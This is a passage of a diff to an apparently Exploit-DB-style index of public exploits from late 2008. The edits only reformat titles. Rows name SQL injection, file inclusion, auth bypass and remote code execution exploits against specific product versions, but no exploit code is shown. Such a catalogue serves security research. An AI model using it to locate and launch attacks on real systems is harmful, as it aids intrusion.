off)",2008-10-28,StAkeR,php,webapps,0 6862,platforms/php/webapps/6862.txt,"H2O-CMS <= 3.4 Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit",2008-10-29,"Jeremy Brown",windows,dos,0 -6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec",2008-10-29,GoLd_M,cgi,webapps,0 +6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Exec",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop <= 1.1 - Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6867,platforms/php/webapps/6867.pl,"WordPress Plugin e-Commerce <= 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 @@ -6460,9 +6460,9 @@ id,file,description,date,author,platform,type,port 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory (directory.php id) SQL Injection",2008-10-31,Hurley,php,webapps,0 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory (directory.php id) SQL Injection",2008-10-31,Hurley,php,webapps,0 -6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 +6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 -6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 (edit.php) Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 +6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - (edit.php) Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF+XSS",2008-10-31,"Henri Lindberg",hardware,remote,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 @@ -6476,7 +6476,7 @@ id,file,description,date,author,platform,type,port 6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO (track.php id) Remote SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate (cat_id) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 (SQL Injection) Auth Bypass",2008-10-31,Hakxer,php,webapps,0 +6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (SQL Injection) Auth Bypass",2008-10-31,Hakxer,php,webapps,0 6913,platforms/php/webapps/6913.txt,"SFS EZ Webring (cat) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not (phid) Remote SQL Injection",2008-10-31,d3b4g,php,webapps,0 6915,platforms/php/webapps/6915.txt,"SFS EZ Software (id) Remote SQL Injection",2008-10-31,x0r,php,webapps,0 @@ -6494,7 +6494,7 @@ id,file,description,date,author,platform,type,port 6927,platforms/php/webapps/6927.txt,"AJ ARTICLE (featured_article.php mode) SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - RFI",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 -6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 +6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - (details.php id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6932,platforms/php/webapps/6932.txt,"AJ ARTICLE (SQL Injection) Remote Auth Bypass",2008-11-01,Hakxer,php,webapps,0 6933,platforms/php/webapps/6933.pl,"Micro CMS <= 0.3.5 - Remote (Add/Delete/Password Change) Exploit",2008-11-01,StAkeR,php,webapps,0 @@ -6535,30 +6535,30 @@ id,file,description,date,author,platform,type,port 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b (SQL Injection) Remote Auth Bypass",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 6972,platforms/php/webapps/6972.txt,"pppBlog <= 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 -6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 +6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - (SQL/XSS) Multiple Vulnerabilities",2008-11-04,G4N0K,php,webapps,0 6975,platforms/php/webapps/6975.txt,"Joomla Component VirtueMart Google Base 1.1 - RFI",2008-11-04,NoGe,php,webapps,0 6976,platforms/php/webapps/6976.txt,"Joomla Component ongumatimesheet20 4b - RFI",2008-11-04,NoGe,php,webapps,0 -6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection",2008-11-04,"Hussin X",php,webapps,0 +6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card <= 1.02 - (catid) SQL Injection",2008-11-04,"Hussin X",php,webapps,0 6978,platforms/php/webapps/6978.txt,"Vibro-CMS - Multiple Remote SQL Injection Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape (id) Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6980,platforms/php/webapps/6980.txt,"Joomla Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS (nID) Remote SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 -6982,platforms/php/webapps/6982.txt,"CMS-School 2005 (showarticle.php) Remote SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 +6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - (showarticle.php) Remote SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 -6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 -6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 +6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 +6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz <= 1.02 - (Auth Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop <= 1.02 - (SQL Injection) Auth Bypass",2008-11-04,Hakxer,php,webapps,0 6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - SQL Injection Auth Bypass",2008-11-04,Yuri,php,webapps,0 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection",2008-11-04,G4N0K,php,webapps,0 6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card <= 1.02 - (SQL Injection) Auth Bypass",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito includefile Local File Inclusion Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 -6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 +6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 - (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw <= 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit",2008-11-04,"Charles Fol",php,webapps,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 -6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 +6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal (Tour.php id) SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 6999,platforms/php/webapps/6999.txt,"pre multi-vendor shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 @@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion Vulnerabilities",2008-11-06,Nine:Situations:Group,php,webapps,0 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 -7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 (Auth Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 +7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Auth Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection Vulnerabilities",2008-11-06,InjEctOr5,php,webapps,0 7017,platforms/php/webapps/7017.txt,"Pre ADS Portal <= 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 7018,platforms/php/webapps/7018.txt,"NICE FAQ Script (Auth Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 @@ -6587,7 +6587,7 @@ id,file,description,date,author,platform,type,port 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0 7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 -7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 +7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - (XSS/SQL) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 7028,platforms/php/webapps/7028.txt,"turnkeyforms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 @@ -6604,15 +6604,15 @@ id,file,description,date,author,platform,type,port 7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - (Auth Bypass) SQL Injection",2008-11-07,r45c4l,php,webapps,0 7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - (Auth Bypass) SQL Injection",2008-11-07,Cyber-Zone,php,webapps,0 -7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7047,platforms/php/webapps/7047.txt,"DeltaScripts PHP Classifieds <= 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 (cat_id) SQL Injection",2008-11-07,Stack,php,webapps,0 +7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - (cat_id) SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure/XSS) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0 -7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 (id) Remote SQL Injection",2008-11-07,"Hussin X",php,webapps,0 +7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - (id) Remote SQL Injection",2008-11-07,"Hussin X",php,webapps,0 7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 - (.rt) Stack Buffer Overflow Exploit",2008-11-07,SkD,windows,local,0 -7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 (id) Remote SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 +7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - (id) Remote SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 @@ -6625,19 +6625,19 @@ id,file,description,date,author,platform,type,port 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form (form_id) Blind SQL Injection Exploit",2008-11-08,boom3rang,php,webapps,0 -7065,platforms/php/webapps/7065.txt,"Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 +7065,platforms/php/webapps/7065.txt,"Cyberfolio <= 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Auth Bypass",2008-11-08,G4N0K,php,webapps,0 -7067,platforms/asp/webapps/7067.txt,"DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 +7067,platforms/asp/webapps/7067.txt,"DigiAffiliate <= 1.4 - (Auth Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Auth Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Auth Bypass",2008-11-08,Stack,php,webapps,0 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final (Auth Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0 -7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0 +7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine <= 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 7075,platforms/jsp/webapps/7075.txt,"Openfire Server <= 3.6.0a - (Auth Bypass/SQL/XSS) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (XSS/Auth Bypass/Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 -7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 -7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 +7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 +7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPguestbook (guestbook.php) Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ ARTICLE Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 @@ -6649,7 +6649,7 @@ id,file,description,date,author,platform,type,port 7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 - Multiple Buffer Overflow Vulnerabilities PoC (OSX)",2008-11-11,xwings,osx,dos,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 -7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0 +7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 7092,platforms/php/webapps/7092.txt,"Joomla Component com_books (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0 7093,platforms/php/webapps/7093.txt,"Joomla Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0 @@ -6658,7 +6658,7 @@ id,file,description,date,author,platform,type,port 7096,platforms/php/webapps/7096.txt,"Joomla Component Simple RSS Reader 1.0 - RFI",2008-11-11,NoGe,php,webapps,0 7097,platforms/php/webapps/7097.txt,"Joomla Component com_marketplace 1.2.1 - (catid) SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - (cid) Remote SQL Injection",2008-11-11,"Hussin X",php,webapps,0 -7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 (Community) Remote BoF PoC",2008-11-12,"Praveen Darshanam",windows,dos,0 +7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote BoF PoC",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 @@ -6667,7 +6667,7 @@ id,file,description,date,author,platform,type,port 7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass",2008-11-12,G4N0K,php,webapps,0 7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 -7109,platforms/windows/dos/7109.txt,"Pi3Web <= 2.0.3 (ISAPI) Remote Denial of Service Exploit",2008-11-13,"Hamid Ebadi",windows,dos,0 +7109,platforms/windows/dos/7109.txt,"Pi3Web <= 2.0.3 - (ISAPI) Remote Denial of Service Exploit",2008-11-13,"Hamid Ebadi",windows,dos,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - File Upload",2008-11-13,ZoRLu,php,webapps,0 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 @@ -6677,16 +6677,16 @@ id,file,description,date,author,platform,type,port 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0 7118,platforms/php/webapps/7118.txt,"turnkeyforms Text Link Sales Auth Bypass",2008-11-14,G4N0K,php,webapps,0 7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 -7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 (Auth Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 -7121,platforms/php/webapps/7121.pl,"SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 +7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Auth Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 +7121,platforms/php/webapps/7121.pl,"SlimCMS <= 1.0.0 - (edit.php) Remote SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal Multiple SQL Injection",2008-11-14,InjEctOr5,php,webapps,0 -7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 (Auth Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 +7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Auth Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"turnkeyforms Text Link Sales (id) XSS/SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7125,platforms/windows/remote/7125.txt,"SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow PoC",2008-11-15,r0ut3r,windows,dos,0 -7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 +7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0 -7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 +7130,platforms/php/webapps/7130.php,"Minigal b13 - (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection",2008-11-16,snakespc,php,webapps,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0 @@ -6694,51 +6694,51 @@ id,file,description,date,author,platform,type,port 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 7137,platforms/asp/webapps/7137.txt,"OpenASP <= 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 -7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 +7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Remote XSS/SQL Injection Vulnerabilities",2008-11-17,Bl@ckbe@rD,asp,webapps,0 7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Remote Arbitrary File Creation Exploit",2008-11-17,Zigma,windows,remote,0 -7143,platforms/php/webapps/7143.txt,"phpfan 3.3.4 (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 +7143,platforms/php/webapps/7143.txt,"phpfan 3.3.4 - (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies (categoryID) Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 -7145,platforms/windows/remote/7145.txt,"Exodus 0.10 (uri handler) Arbitrary Parameter Injection",2008-11-17,Nine:Situations:Group,windows,remote,0 -7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 (Auth Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 +7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - (uri handler) Arbitrary Parameter Injection",2008-11-17,Nine:Situations:Group,windows,remote,0 +7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Auth Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 -7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 +7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript <= 4.0.1.50 Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - CSRF (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 7151,platforms/linux/remote/7151.c,"No-IP DUC <= 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 -7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 -7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 +7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 